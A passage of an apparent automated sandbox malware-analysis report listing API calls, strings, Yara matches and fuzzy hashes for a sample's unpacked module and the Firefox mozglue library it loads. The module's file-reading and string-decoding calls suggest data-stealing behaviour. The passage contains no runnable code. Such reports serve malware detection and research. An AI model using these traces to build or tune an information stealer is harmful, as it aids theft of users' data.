                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                                                                                                                                                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                                                                                                                                                                              • API String ID: 2380290044-2272602182
                                                                                                                                                                                                                              • Opcode ID: 8037b70ff4d27b5e5bf2dac322b602921f2a98ba11edd0d611c4c406f53d7a5e
                                                                                                                                                                                                                              • Instruction ID: 2a25e4b2cc4a51f4dbf6225555b276c836c988b4b797bd3afc66eaaec730c69e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8037b70ff4d27b5e5bf2dac322b602921f2a98ba11edd0d611c4c406f53d7a5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1918C71A042858BDF24EF78D8C5B3E77A6FB85310B244578E9219B285D77AE802CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6BB81213
                                                                                                                                                                                                                              • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BB81285
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6BB812B9
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6BB81327
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6BB8120D
                                                                                                                                                                                                                              • MZx, xrefs: 6BB811E1
                                                                                                                                                                                                                              • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6BB812AD
                                                                                                                                                                                                                              • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6BB8131B
                                                                                                                                                                                                                              • &, xrefs: 6BB8126B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$toupper
                                                                                                                                                                                                                              • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                                                                                                                                                              • API String ID: 403083179-3658087426
                                                                                                                                                                                                                              • Opcode ID: 485f4731bb67496a32484f463c862ebca8fa300faf0ff9595b5e53812b3ae8c0
                                                                                                                                                                                                                              • Instruction ID: 38c75c936364ddacc7d695c343f2eb2a4ed88a8dc9875574bbab6032843ae7c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 485f4731bb67496a32484f463c862ebca8fa300faf0ff9595b5e53812b3ae8c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D71B571D067A49BDB209F74C8017EEB7F5FF48349F08055ED559A3240D7386A89CBA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6BB73217
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6BB73236
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 6BB7324B
                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 6BB73260
                                                                                                                                                                                                                              • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6BB7327F
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BB7328E
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BB732AB
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BB732D1
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BB732E5
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6BB732F7
                                                                                                                                                                                                                                • Part of subcall function 6BBAAB89: EnterCriticalSection.KERNEL32(6BBFE370,?,?,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284), ref: 6BBAAB94
                                                                                                                                                                                                                                • Part of subcall function 6BBAAB89: LeaveCriticalSection.KERNEL32(6BBFE370,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284,?,?,6BB956F6), ref: 6BBAABD1
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6BB7346B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                                                                                                                                                              • String ID: KernelBase.dll$QueryInterruptTime
                                                                                                                                                                                                                              • API String ID: 3006643210-2417823192
                                                                                                                                                                                                                              • Opcode ID: 66896513920138b996db6f7b539d9c7f0ec997fb406b614b018a9c8e6e05189b
                                                                                                                                                                                                                              • Instruction ID: eb5c32e7919aa31e06d5e516f03f7b9a26fb50f5a9773949f387a0bd317f2375
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66896513920138b996db6f7b539d9c7f0ec997fb406b614b018a9c8e6e05189b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47610271908B818BC725DF38D45162AB3E9FFC6350F218B2DE9A5A3290EB35D546CB42
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                              • Opcode ID: 52d09828bd6328d95c269d46c52906f376363bf45c2a71b165d5bab26f2389d9
                                                                                                                                                                                                                              • Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52d09828bd6328d95c269d46c52906f376363bf45c2a71b165d5bab26f2389d9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F4E
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F65
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411F9C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6CE8), ref: 00411FBB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00411FCF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6988), ref: 00411FE3
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                • Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,042F65E0), ref: 0040971B
                                                                                                                                                                                                                                • Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                • Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,042F8518), ref: 0041209D
                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00412199
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041212A
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00412159
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 0041216C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3662689742-0
                                                                                                                                                                                                                              • Opcode ID: f5db646830afb3b51793a6e0b6e4721c7518e8da438697001fa247f991728a2a
                                                                                                                                                                                                                              • Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5db646830afb3b51793a6e0b6e4721c7518e8da438697001fa247f991728a2a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AcquireSRWLockShared.KERNEL32 ref: 6BB83BB4
                                                                                                                                                                                                                              • ReleaseSRWLockShared.KERNEL32 ref: 6BB83BD2
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32 ref: 6BB83BE5
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32 ref: 6BB83C91
                                                                                                                                                                                                                              • ReleaseSRWLockShared.KERNEL32 ref: 6BB83CBD
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE ref: 6BB83CF1
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1881024734-0
                                                                                                                                                                                                                              • Opcode ID: 16740de65c0af19e1aae0798d0f16fb8231606946a16384acc11c63e24231ec0
                                                                                                                                                                                                                              • Instruction ID: 096d0a6a20530e697bd959d970841aa7f60171e609e6ac027ec26edb342bfb6f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16740de65c0af19e1aae0798d0f16fb8231606946a16384acc11c63e24231ec0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09C15FB1904781CFC724DF28C09465ABBF6FF89304F158A6EE8998B311D775E885CB82
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEBA4
                                                                                                                                                                                                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BBBEBAC
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEBC1
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8,?,?,00000000), ref: 6BBBEBCE
                                                                                                                                                                                                                              • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BBBEBE5
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8,00000000), ref: 6BBBEC37
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BBBEC46
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BBBEC55
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6BBBEC5C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BBBEA9B
                                                                                                                                                                                                                              • [I %d/%d] profiler_start, xrefs: 6BBBEBB4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                              • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                                                                                              • API String ID: 4250961200-1186885292
                                                                                                                                                                                                                              • Opcode ID: bc9325ec6a64a2801ff3984c97e6b3c581357a875f10edb1f2cd3328a67f0a17
                                                                                                                                                                                                                              • Instruction ID: 33d7f8031a5e67d655066bd0aca9d115be9550431e351eb566c4a3b46d3ff5ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc9325ec6a64a2801ff3984c97e6b3c581357a875f10edb1f2cd3328a67f0a17
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F1103768005549FDF209F74E849A7E7B6DEF06368F004660FE1997341DB3AD805CBA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBAD9DB), ref: 6BBAF2D2
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6BBAF2F5
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6BBAF386
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BBAF347
                                                                                                                                                                                                                                • Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BBAF3C8
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000), ref: 6BBAF3F3
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000), ref: 6BBAF3FC
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,00000000), ref: 6BBAF413
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                                                                                                                                                                              • String ID: ntdll.dll
                                                                                                                                                                                                                              • API String ID: 301460908-2227199552
                                                                                                                                                                                                                              • Opcode ID: ba885b26c67d3894b5a8d1faa54e88ca64ddc982004838daca56a44aa40b33c1
                                                                                                                                                                                                                              • Instruction ID: 2381a7beacc13d8ba7f57d1cdb4d10bf855421300bb08cf022d842ec407ea601
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba885b26c67d3894b5a8d1faa54e88ca64ddc982004838daca56a44aa40b33c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 674111B1E042849BDB04AF78E8527AEB7F9EF45354F10442DD81AE7380EB3AE805C785
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(6BBFF618), ref: 6BBD6A68
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 6BBD6A7D
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 6BBD6AA1
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFF618), ref: 6BBD6AAE
                                                                                                                                                                                                                              • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BBD6AE1
                                                                                                                                                                                                                              • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BBD6B15
                                                                                                                                                                                                                              • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6BBD6B65
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFF618,?,?), ref: 6BBD6B83
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                                                                                                                                                                                              • String ID: SymInitialize
                                                                                                                                                                                                                              • API String ID: 3103739362-3981310019
                                                                                                                                                                                                                              • Opcode ID: 64fbbff93110b2630ab42ba3446514a9faff379aca9af78b492d619e88a51e9a
                                                                                                                                                                                                                              • Instruction ID: 543a4908e241119b6787bfbb015bf71a292ba3ce215251691995e21072eeb4c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64fbbff93110b2630ab42ba3446514a9faff379aca9af78b492d619e88a51e9a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41C270605384AFDB10CF74D889BAA3BACEF46304F044579ED498F282DBB6D548CB61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBDBE1
                                                                                                                                                                                                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBBDBE9
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508
                                                                                                                                                                                                                              • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BBBDC5D
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BBBDC7F
